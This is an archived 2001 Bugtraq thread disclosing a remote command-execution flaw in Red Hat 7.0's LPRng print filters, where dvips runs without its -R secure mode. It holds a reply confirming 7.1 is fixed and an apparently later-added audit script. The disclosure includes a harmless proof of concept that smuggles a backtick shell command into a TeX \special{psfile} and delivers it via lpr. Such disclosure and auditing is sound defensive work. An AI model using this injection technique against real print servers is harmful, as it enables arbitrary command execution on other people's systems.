6986564 2001-08-28 01:44 +1200  /71 lines/ zen-parse <zen-parse@gmx.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-27  17:43  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18966>
Subject: LPRng/rhs-printfilters - remote execution of commands
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108280131001.984-100000@clarity.local>

(posted to vendor security ppl, no reply, no patch, so posting here.)
--begin forwarded message--

RedHat 7.0 (possibly others)

If the lpd is listening on 0.0.0.0 and no access controls are in
place, it is possible to execute commands as the lp user, assuming
tetex-dvips is installed.

From man dvips
...
       -R     Run in secure mode. This  means  that  ``backtick''
              commands  from  a \special{} or \psffile{} macro in
              the  (La)TeX  source  like   \special{psfile="`zcat
              foo.ps.Z"}   or   \psffile[72  72  540  720]{"`zcat
              screendump.ps.gz"} are not executed.
...

Unless the -R option is passed, the attached file will, when
converted to a .dvi file (tex spool.tex), start a worm. A very
primitive, proof of concept worm, with no payload, but it does stall
the printer.  (So don't run it without at least modifying it to do
something else.)

/usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi
...
dvips -f $DVIPS_OPTIONS < $TMP_FILE
...

change it to
...
dvips -R -f $DVIPS_OPTIONS < $TMP_FILE
...

and it should be a little safer.

-- zen-parse

--end forwarded message--

I deleted the worm file before posting this to BugTraq. It's 2 lines
of bash, but not really the kind of thing that is helpful to post
here.

-rw-r--r--    1 evil     evil          152 Aug 16 16:37 spool.tex

Instead, use this to test your machine.

cat >proof-of-concept.tex <<EOF
\special{psfile="`touch /tmp/lpowned"}
\end
EOF
tex proof-of-concept
lpr proof-of-concept.dvi

-- zen-parse

             [ mp3.com/cosv  -  new music added this month ]
             [ ============ ] [ ========================== ]
-- 
-------------------------------------------------------------------------
The preceding information, unless directly posted by zen-parse@gmx.net to
an open forum is confidential information and not to be distributed
(without explicit permission being given by zen-parse@gmx.net). Legal
action may be taken to enforce this. If you are mum or dad, this probably
doesn't apply to you.
(6986564) /zen-parse <zen-parse@gmx.net>/-(Rewrapped)
6988595 2001-08-27 16:54 -0400  /22 lines/ Matt Bing <mbing@nfr.net>
Sent by: joel@lysator.liu.se
Imported: 2001-08-27  23:39  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18972>
Subject: Re: LPRng/rhs-printfilters - remote execution of commands
------------------------------------------------------------
From: Matt Bing <mbing@nfr.net>
To: bugtraq@securityfocus.com
Message-ID: <20010827165434.A23344@karloff.bing.nfr.net>

> RedHat 7.0 (possibly others)

Redhat 7.1 is not vulnerable. If tetex-dvips is installed, the filter
/usr/share/printconf/mf_rules/mf40-tetex_filters contains the '-R' 
switch:

#
# tetex filters
#

/dvi/  fpipe/postscript/       /usr/bin/dvips -t PAGEsize ifdef(`XDPI',-X XDPI -Y YDPI, ifdef(`DPI',-D DPI,-D 600)) -R -q -f $FILE

-- 
Matt Bing
NFR Security
Rapid Response Team
(6988595) /Matt Bing <mbing@nfr.net>/---------------
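As an added audit check, written for this thread and not code from either poster, the script below flags dvips invocations in print-filter scripts that lack the -R (secure mode) switch the advisory recommends. It runs against constructed copies of the unpatched and patched dvi-to-ps.fpi lines from the first message and of the Red Hat 7.1 mf40-tetex_filters rule from the reply (with the m4 ifdef() resolution left out); the sample file names and paths are assumptions.

```shell
#!/bin/sh
# Added audit helper, not part of the original advisory: list every dvips
# invocation in a print-filter script that lacks the -R (secure mode) switch,
# the setting that lets backtick \special commands run during dvi-to-ps.

check_dvips_secure() {
    # Usage: check_dvips_secure FILE...
    # Prints "file:line:text" for each dvips call without -R; returns 1 if any.
    insecure=$(grep -n 'dvips' "$@" /dev/null 2>/dev/null \
        | grep -v -E '^[^:]*:[0-9]+:[[:space:]]*#' \
        | grep -v -E '(^|[[:space:]])-R([[:space:]]|$)' || true)
    if [ -n "$insecure" ]; then
        printf '%s\n' "$insecure"
        return 1
    fi
    return 0
}

# Constructed sample filter files modelled on the three invocations quoted in
# this thread (the m4 ifdef() part of the 7.1 rule is left out); not the real files.
mk_samples() {
    dir=${TMPDIR:-/tmp}/dvips-audit.$$
    mkdir -p "$dir"
    printf '%s\n' '# dvi-to-ps.fpi, unpatched' \
        'dvips -f $DVIPS_OPTIONS < $TMP_FILE' > "$dir/vuln.fpi"
    printf '%s\n' '# dvi-to-ps.fpi, with the suggested change' \
        'dvips -R -f $DVIPS_OPTIONS < $TMP_FILE' > "$dir/fixed.fpi"
    printf '%s\n' '# tetex filters' \
        '/dvi/  fpipe/postscript/       /usr/bin/dvips -t PAGEsize -D 600 -R -q -f $FILE' \
        > "$dir/mf40-tetex_filters"
    echo "$dir"
}

SAMPLE_DIR=$(mk_samples)
if check_dvips_secure "$SAMPLE_DIR"/*; then
    echo "all dvips invocations run in secure mode (-R)"
else
    echo "the dvips invocations listed above lack -R; add the switch as the advisory suggests"
fi
```

To audit a real system, call check_dvips_secure on the filter files themselves, e.g. /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi or /usr/share/printconf/mf_rules/mf40-tetex_filters.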